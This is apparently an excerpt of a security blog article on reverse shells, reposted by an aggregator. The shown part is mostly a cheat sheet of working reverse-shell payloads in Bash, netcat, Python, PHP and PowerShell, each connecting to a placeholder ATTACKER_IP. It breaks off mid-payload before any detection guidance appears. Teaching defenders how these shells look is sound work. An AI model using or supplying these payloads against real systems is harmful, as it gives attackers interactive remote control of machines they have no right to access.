Reverse Shell Commands and How to Detect Them

23 hours ago 3

BOOK THIS SPACE FOR AD

ARTICLE AD

A reverse shell is a technique used by attackers to gain unauthorized access to a remote system by initiating an outbound connection from the target to the attacker’s machine. This allows attackers to bypass firewall restrictions and gain control over the system remotely. Understanding how reverse shells work and how to detect them is crucial for cybersecurity professionals.

Reverse shells can be established using various programming languages and tools. Below are some of the most commonly used commands:

1. Bash Reverse Shell

bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1

This command uses Bash to establish an interactive shell with the attacker’s machine.

2. Netcat Reverse Shell

nc -e /bin/sh ATTACKER_IP PORTnc -c bash ATTACKER_IP PORTrm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc ATTACKER_IP PORT > /tmp/f

Netcat (nc) is a widely used tool for reverse shell connections.

3. Python Reverse Shell

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("ATTACKER_IP",PORT))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
import pty; pty.spawn("/bin/sh")

Python scripts can be used to establish a reverse shell on systems with Python installed.

Image Credits : Here

4. PHP Reverse Shell

<?php
$socket=fsockopen("ATTACKER_IP",PORT);
exec("/bin/sh -i <&3 >&3 2>&3");
?>

This command creates a reverse shell using PHP.

5. PowerShell Reverse Shell (Windows)

$client = New-Object System.Net.Sockets.TCPClient("ATTACKER_IP",PORT);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + "PS " + (pwd).Path + "> ";
$sendbyte =…

Read Entire Article